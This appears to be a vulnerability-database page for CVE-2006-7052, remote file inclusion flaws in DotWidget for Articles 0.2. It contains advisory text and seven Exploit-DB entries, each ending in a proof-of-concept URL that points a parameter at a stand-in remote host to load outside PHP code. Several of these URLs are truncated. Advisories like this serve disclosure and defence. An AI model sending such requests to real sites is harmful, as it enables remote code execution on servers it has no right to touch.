CVE-2006-7052
published 2007-02-24
Priority: P345 · Severity: critical · CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.36% (92.8th percentile)
Multiple PHP remote file inclusion vulnerabilities in DotWidget For Articles (dotwidgeta) 0.2 allow remote attackers to execute arbitrary code via a URL in the (1) file_path parameter to (a) index.php, (b) showcatpicks.php, and (c) showarticle.php; and the (2) admin_header_file and (3) admin_footer_file parameters to (d) admin/authors.php, (e) admin/index.php, (f) admin/categories.php, (g) admin/editconfig.php, and (h) admin/articles.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| keith_reichley | dotwidget_for_articles | — | — |
No detection rules found.
Exploit-DB
dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/authors.php?admin_header_file=http://www.
Exploit-DB
dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/categories.php?admin_header_file=http:
Exploit-DB
dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/editconfig.php?admin_header_file=http:
Exploit-DB
dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/articles.php?admin_footer_file=http://ww
Exploit-DB
dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/index.php?admin_header_file=http://www.exam
Exploit-DB
dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/showcatpicks.php?file_path=http://www.example2.co
Exploit-DB
dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion
exploitdb·2006-06-03
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issues may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/showarticle.php?file_path=http://www.example2.com/
No writeups or analysis indexed.
http://securityreason.com/securityalert/2308
http://www.securityfocus.com/archive/1/437483
http://www.securityfocus.com/bid/18479
https://exchange.xforce.ibmcloud.com/vulnerabilities/27327
Published: 2007-02-24